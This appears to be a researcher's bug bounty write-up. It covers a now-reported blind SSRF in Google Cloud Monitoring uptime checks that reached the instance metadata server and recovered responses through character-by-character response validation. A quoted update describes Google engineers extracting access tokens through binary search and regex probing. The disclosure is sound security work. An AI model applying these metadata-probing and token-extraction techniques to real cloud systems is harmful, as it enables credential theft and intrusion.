Update 25.01.2021: Added Google engineers exploit method for getting access token.
Google Cloud Monitoring (formerly called Stackdriver) is a service, which provides monitoring for cloud
resources (VM instances, App Engine, Cloud functions...). It is available from Google Cloud Console. This service offers monitoring, alerting, uptime checks of cloud resources and much more. It is important to note that the Google Cloud Monitoring service itself is running on Google Cloud virtual machines.
Every virtual machine in Google Cloud stores its metadata on the metadata server. Those metadata include project ID, service account information, information about the virtual machine, or public ssh keys. The metadata might be queried from within the instance (from the IP address 169.254.169.254) or from the Compute Engine API.
One of the services that Google Cloud Monitoring offers are Uptime checks. An Uptime check is a service, that sends periodically requests to a resource to see if it responds. A check can be used to determine the availability of App Engine, VM instance, URL, etc.
I started to test this feature for SSRF by creating an uptime check, which sends a request to an URL/IP address. Most of the URLs and IP addresses, that are usual SSRF targets were blocked. But since the Cloud Monitoring itself is running on Google Cloud VM instances, there was a possibility that I could try to call metadata endpoints, because the request to the metadata endpoint itself would be sent from within the instance.
When the metadata are queried from within the virtual machine, it is required to include header "Metadata-Flavor: Google" for metadata API version "v1" (older versions of metadata API did not require this header). Luckily there was an option to add custom headers to the request, so that was not an issue.
I created the uptime check with the following parameters:
Custom Headers: Metadata-Flavor: Google (required for /v1/ metadata endpoints)
Then I pressed the Test button on the bottom of the Uptime check creation form, which sent a request to the metadata server and then displayed that the check was successful.
The response I saw was:
Because the response code was 200 and the response time was 2 ms, I was sure that the metadata endpoint is reachable via uptime check (request to external URL would take much longer). The problem was that the response body to this request was not visible. Only two things that were returned were the response code and response time. At this point, this was only blind SSRF.
To get the response body, I used another Uptime check feature - Response validation. Response validation is a feature that checks if the response body contains a specific string. The example configuration could be seen in the image below.
The method I used was following - I started by looking for one character that is included in the response. I did this by gradually testing whether the response contained one of all possible characters. Then after one character was found, I tried to find second character by appending or prepending characters to the already found character and trying again if it was contained in the response. This process would be repeated until the full response was parsed from the metadata server.
For example, I would try whether the response contains characters 'a', 'b', 'c'... Let's say I found that 'c' is contained in the response. Then I would continue and try to prepend or append another character and tried to find if the response includes characters 'ca', 'cb', 'cc'... Then if I found that 'ca' is returned in the response, I would try another combinations - 'caa', 'cab', 'cac'... and repeat the process until I got the response.
To do the response body validation I used the endpoint which is called, when the Test button in the Uptime check form is pressed.
The request looked like this:
I created a simple Python script, which parses the response using the described method automatically. The script is available here - https://gist.github.com/nechudav/0b2e0217ffe31a3cd1c1743c590595e6
With this script, I obtained project-level metadata - public SSH key, project name and other information about the Google Cloud Monitoring project. It was also possible to get instance-level metadata which are same for all instances (machine type, CPU platform...). But I struggled with getting instance-level metadata that are unique for each instance or data that are periodically refreshed (for example service account tokens, IP addresses of the instances). It was because Uptime check service is running on multiple instances across the world (there were about 54 running instances) and the requests made to the service are load-balanced. So there was no assurance that multiple requests would be sent to the same instance. Getting unique instance-level metadata would require sending large amount of requests, which was problematic, because the API was rate-limited and it would be very time-consuming. At this point I did not continue in the research.
I reported the issue, it got accepted, and Google VRP rewarded me $31,337 for this bug. I'd like to thank Google VRP team for the reward and quick response.
Time of report: June 2020
Update: Google engineers found a really nice and clever way to obtain access tokens by reducing number of requests using binary search and regex. Below is the comment describing their solution.
We actually ended up writing an exploit to get an access token, after struggling with the same limitation. The two main tricks were binary search for each character (to send fewer requests) and probing both positive and negative matches (to get reliably results). For example:
One of those requests must eventually return a success response when
we hit the correct backend. We'd repeat queries (up to some limit) until
we get any OK response and then adjust the search space based on that.
Thanks to regexps you can probe multiple characters in parallel (
In the beginning tokens will overlap, but after ~10 characters or so we
usually had a unique prefix. Access tokens are valid for 60 minutes, so
on average you have 30 minutes.
In the end the exploit took ~15 minutes to get a full access token,
including rate limiting.
Fun bug. :)